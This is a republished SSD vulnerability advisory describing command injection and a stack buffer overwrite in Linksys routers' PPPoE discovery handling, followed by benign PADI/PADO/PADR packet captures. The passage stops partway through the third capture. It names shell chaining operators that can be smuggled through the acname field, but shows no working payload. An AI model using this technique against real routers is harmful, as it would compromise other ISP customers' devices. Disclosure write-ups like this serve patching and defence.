{"id":7393,"date":"2017-04-19T14:20:00","date_gmt":"2017-04-19T22:20:00","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/04\/19\/news-1184\/"},"modified":"2017-04-19T14:20:00","modified_gmt":"2017-04-19T22:20:00","slug":"news-1184","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/04\/19\/news-1184\/","title":{"rendered":"SSD Advisory \u2013 Linksys PPPoE Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Wed, 19 Apr 2017 13:52:33 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3102\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3102');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in Linksys EA, XAC and AC series devices.<\/p>\n<p>The vulnerabilities has been found in the way the Linksys devices (EA, XAC and AC series) handle the Point-to-point protocol over Ethernet (PPPoE) Discovery (PPPoED) process allowing an unprivileged active attacker on the same network segment (layer2) to inject arbitrary shell commands by answering PPPoE Active Discovery probe requests (PADI) with a malicious PPPoE Active Discovery Offer (PADO). The exact same code is also vulnerable to a buffer overwrite.<\/p>\n<p>The vulnerabilities are:<\/p>\n<ul>\n<li>Command Injection<\/li>\n<li>Buffer Overwrite<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, 0x721427D8, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> Linksys has released patches to address this vulnerability.<\/p>\n<p><span id=\"more-3102\"><\/span><\/p>\n<p><strong>Vulnerabilities Details<\/strong><br \/> The Linksys wireless-router firmware is based on linux and a set of open-source daemons including Linksys specific modifications to these services. One of these modifications is a series of patches to the ppp package including rp-pppoe (Roaring Penguin) the PPPoE discovery module. One specific patch attempts to extract the DSL Access Concentrator Name (acname) from the PPPoE Active Discovery Offer (see section Details) that is received as a response to the routers PPPoE session initiation attempt.<\/p>\n<p>This value is then stored within the firmware&#8217;s environment by executing a shell command <em>sysevent set <\/em> where is exactly the value taken from the packet. The <em>acname<\/em> is at no point neither validated nor sanitized therefore allowing any PADO to inject arbitrary shell commands to the Linksys firmware by chaining commands or spawning a subshell <em>( ; , || , &amp;&amp; , $(subcommand), cmd, &#8230;)<\/em><\/p>\n<p>The exact same patch also introduces a buffer overwrite vulnerability by failing to limit the attacker provided Service-Name length while forming the <em>sysevent<\/em> command which is stored to a fixed size 256 byte stack buffer <em>cmd<\/em>. Any <em>acname<\/em> &gt; 226 bytes will overwrite the stack allocated 256 byte buffer.<\/p>\n<p>Since PPPoE is typically used for dial-up this vulnerability is exploited on the WAN interface and will require PPPoE dialup being configured. Some ISPs (especially DOCSIS ISPs) fail to protect their WAN dialup ethernet segment which might potentially allow an attacker to compromise other vulnerable customer devices if they share the same dialup broadcast domain.<\/p>\n<p><strong>PPP and PPPoE Discovery Protocol<\/strong><br \/> The Point-to-Point protocol (PPP) is used by ISPs to enable dial-up connections to the internet. PPP was originally designed to work with serial connections but can be encapsulated in other data link layer protocols like Ethernet (PPPoE) or Asynchronous Transfer Mode (ATM) (PPPoA or PPPoATM).<\/p>\n<p>PPPoE is a network protocol that encapsulates Point-to-point (PPP) frames in Ethernet frames. PPPoE establishes a point-to-point connection between two Ethernet nodes. In order to initiate a PPPoE session the Ethernet MAC-Address of the preferred peer (e.g. the DSL access concentrator) has to be identified. This process of enumerating and picking an ethernet peer for PPPoE session initiation is called PPPoE discovery:<\/p>\n<p><u>Step 1: INITIATION<\/u> &#8211; In order to find the MAC Address of the preferred DSL access concentrator (DSL-AC) the client broadcasts a PPPoE Active Discovery Initiation (PADI) packet. The PADI contains MAC address of the initiator and optionally the Service-Name of the DSL-AC the client would like to be connected to as it is possible to have multiple DSL-ACs service different Service-Names on the same segment for PPPoE.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7c9f833259787\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Frame 1: 24 bytes on wire (192 bits), 24 bytes captured (192 bits)  Ethernet II, Src: 20:28:18:a0:a9:d2 (20:28:18:a0:a9:d2), Dst: Broadcast (ff:ff:ff:ff:ff:ff)  PPP-over-Ethernet Discovery      0001 &#8230;. = Version: 1      &#8230;. 0001 = Type: 1      Code: Active Discovery Initiation (PADI) (0x09)      Session ID: 0x0000      Payload Length: 4      PPPoE Tags<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p><u>Step 2: OFFER<\/u> &#8211; The DSL-AC replies with a PPPoE Active Discovery Offer (PADO). The reply is sent to the initiated MAC address (taken from PADI) along with the DSL-AC name acname (typically a static name configured by the ISP) and the Service-Name. The initiator might receive multiple PADOs for multiple DSL-ACs if no Service-Name was sent with the initial PADI and it is up to the initiator to accept one of the received offers.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7caa870845024\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Frame 2: 60 bytes on wire (480 bits), 60 bytes captured (480 bits)  Ethernet II, Src: Unispher_a4:10:be (00:90:1a:a4:10:be), Dst: 20:28:18:a0:a9:d2 (20:28:18:a0:a9:d2)  PPP-over-Ethernet Discovery      0001 &#8230;. = Version: 1      &#8230;. 0001 = Type: 1      Code: Active Discovery Offer (PADO) (0x07)      Session ID: 0x0000      Payload Length: 35      PPPoE Tags          AC-Name: r-al121          AC-Cookie: bebcb53c10b32769a8661c36a45d8720<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7caa870845024-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7caa870845024-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7caa870845024-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7caa870845024-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7caa870845024-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7caa870845024-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7caa870845024-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7caa870845024-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7caa870845024-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7caa870845024-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7caa870845024-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7caa870845024-1\"><span class=\"crayon-i\">Frame<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">60<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">wire<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">480<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">60<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">captured<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">480<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7caa870845024-2\"><span class=\"crayon-e\">Ethernet <\/span><span class=\"crayon-v\">II<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Src<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Unispher_a4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">be<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">90<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">be<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Dst<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">d2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">d2<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7caa870845024-3\"><span class=\"crayon-v\">PPP<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">over<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Ethernet <\/span><span class=\"crayon-i\">Discovery<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7caa870845024-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0001<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Version<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7caa870845024-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0001<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7caa870845024-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Code<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Active <\/span><span class=\"crayon-e\">Discovery <\/span><span class=\"crayon-e\">Offer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PADO<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x07<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7caa870845024-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Session <\/span><span class=\"crayon-v\">ID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7caa870845024-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Payload <\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">35<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7caa870845024-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PPPoE <\/span><span class=\"crayon-e\">Tags<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7caa870845024-10\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">AC<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">al121<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7caa870845024-11\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">AC<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bebcb53c10b32769a8661c36a45d8720<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0026 seconds] -->  <\/p>\n<p><u>Step 3: REQUEST<\/u> &#8211; In order to confirm acceptanceof the PADO the initiator sends a PPPoE Active Discovery Request (PADR) providing the Cookie sent along the PADO.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cae850913426\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Frame 3: 44 bytes on wire (352 bits), 44 bytes captured (352 bits)  Ethernet II, Src: 20:28:18:a0:a9:d2 (20:28:18:a0:a9:d2), Dst: Unispher_a4:10:be (00:90:1a:a4:10:be)  PPP-over-Ethernet Discovery      0001 &#8230;. = Version: 1      &#8230;. 0001 = Type: 1      Code: Active Discovery Request (PADR) (0x19)      Session ID: 0x0000      Payload Length: 24      PPPoE Tags          AC-Cookie: bebcb53c10b32769a8661c36a45d8720<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cae850913426-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cae850913426-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cae850913426-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cae850913426-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cae850913426-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cae850913426-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cae850913426-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cae850913426-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cae850913426-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cae850913426-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cae850913426-1\"><span class=\"crayon-i\">Frame<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">44<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">wire<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">352<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">44<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">captured<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">352<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cae850913426-2\"><span class=\"crayon-e\">Ethernet <\/span><span class=\"crayon-v\">II<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Src<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">d2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">d2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Dst<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Unispher_a4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">be<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">90<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">be<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cae850913426-3\"><span class=\"crayon-v\">PPP<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">over<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Ethernet <\/span><span class=\"crayon-i\">Discovery<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cae850913426-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0001<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Version<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cae850913426-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0001<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cae850913426-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Code<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Active <\/span><span class=\"crayon-e\">Discovery <\/span><span class=\"crayon-e\">Request<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PADR<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x19<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cae850913426-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Session <\/span><span class=\"crayon-v\">ID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cae850913426-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Payload <\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">24<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cae850913426-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PPPoE <\/span><span class=\"crayon-e\">Tags<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cae850913426-10\"><span 